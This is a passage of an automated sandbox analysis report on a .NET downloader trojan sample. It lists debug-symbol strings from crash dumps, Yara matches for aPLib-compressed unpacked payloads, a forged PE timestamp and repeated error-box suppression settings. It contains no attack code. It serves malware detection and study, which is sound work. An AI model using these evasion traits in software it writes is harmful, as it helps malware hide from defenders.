                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: schannel.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: urlmon.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: System.Configuration.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.271182721.0000000003398000.00000004.00000001.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Xml.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: System.Core.pdb`Q source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: indows.Forms.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.PDB source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: WLDP.pdb: source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscoree.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: bcrypt.pdbH source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: iertutil.pdbX source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcp_win.pdbT source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: nsi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: shell32.pdbR source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: profapi.pdb| source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: cryptsp.pdbF source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdb* source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: iertutil.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: cldapi.pdb< source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: msasn1.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.pdbLL' source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.271419527.0000000003392000.00000004.00000001.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: wimm32.pdb^ source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: secur32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasman.pdbv source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.PDB source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdbRSDSD source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdbl source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasadhlp.pdb" source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ncryptsslp.pdb. source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: nsi.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdbB source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: c.pdbis source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: winhttp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.271165162.0000000003386000.00000004.00000001.sdmp
                Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: WLDP.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: clrjit.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: rasman.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb$ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: jVisualBasic.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: wintrust.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000003.283574346.0000000005678000.00000004.00000001.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.Windows.Forms.pdbl source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdbT3?l source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: psapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb0 source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: cldapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.271182721.0000000003398000.00000004.00000001.sdmp
                Source: Binary string: System.Core.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb` source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: combase.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: .pdbJ source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: edputil.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp

                Data Obfuscation:

                barindex
                Binary contains a suspicious time stampShow sources
                Source: initial sampleStatic PE information: 0xCBF103ED [Sat Jun 4 12:07:09 2078 UTC]
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 2576, type: MEMORY
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_00A68B7D pushfd ; iretd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_00A66543 push es; retf
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00636543 push es; retf
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00638B7D pushfd ; iretd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
